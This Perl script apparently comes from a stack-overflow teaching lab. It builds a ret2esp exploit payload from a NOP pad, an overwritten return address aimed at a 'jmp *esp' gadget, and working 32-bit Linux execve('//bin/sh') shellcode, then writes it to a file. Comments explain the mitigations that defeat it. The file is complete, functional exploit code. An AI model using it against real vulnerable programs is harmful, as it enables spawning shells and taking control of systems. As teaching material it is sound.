#!/usr/bin/perl
# Textbook stack-overflow lab payload ("ret2esp").  The file written below is
# pad + saved-return-address overwrite + shellcode; the overwritten address is
# meant to point at a `jmp *esp` instruction in the target, and the shellcode
# is placed directly after it so it is what %esp points to once the return
# executes.  Every assumption here is one that standard mitigations remove:
# a fixed, known gadget address (ASLR/PIE), an executable stack (NX/DEP) and
# an undetected overwrite of the saved return address (stack canaries abort
# before the `ret`).  The 268-byte offset is specific to one build of the
# target binary; it is not a general value.
#
# Shellcode: builds the string "//bin/sh" on the stack and invokes the
# 32-bit Linux execve system call (number 0xb in %eax, int $0x80).
my $shellcode =
"\x31\xc0".                # xorl %eax, %eax        (zero %eax, also NUL terminator)
"\x50".                    # pushl %eax
"\x68\x6e\x2f\x73\x68".    # pushl $0x68732f6e      ("n/sh", little-endian)
"\x68\x2f\x2f\x62\x69".    # pushl $0x69622f2f      ("//bi" -> "//bin/sh" on the stack)
"\x89\xe3" .               # movl %esp, %ebx        (pathname)
"\x99".                    # cltd                   (%edx = 0, envp = NULL)
"\x52".                    # pushl %edx
"\x53".                    # pushl %ebx
"\x89\xe1".                # movl %esp, %ecx        (argv = {"//bin/sh", NULL})
"\xb0\x0b" .               # movb $0xb, %al         (execve)
"\xcd\x80"                 # int $0x80
;
# This value overwrites the saved return address and must equal the address
# of the `jmp *esp` instruction in the target.  Bytes are little-endian for
# 0x08048442 (a non-PIE text address; a PIE/ASLR build would make it useless).
my $retaddr = "\x42\x84\x04\x08"; #0x08048442
# NOP sled (0x90 = nop); 268 bytes reaches the saved return address for this
# particular target.  Long runs of 0x90 are also a classic detection signature.
my $pad = "\x90" x 268;
# The complete input handed to the vulnerable program.
my $arg = $pad.$retaddr.$shellcode;
# Write the payload to a file in the current directory.
# NOTE(review): bareword filehandle, 2-arg open and no error check on open,
# print or close; the data is binary, so the modern form would be
# `open my $fh, '>:raw', 'payload_ret2esp' or die "...: $!"` with a checked close.
open OUT, "> payload_ret2esp";
print OUT $arg;
close OUT;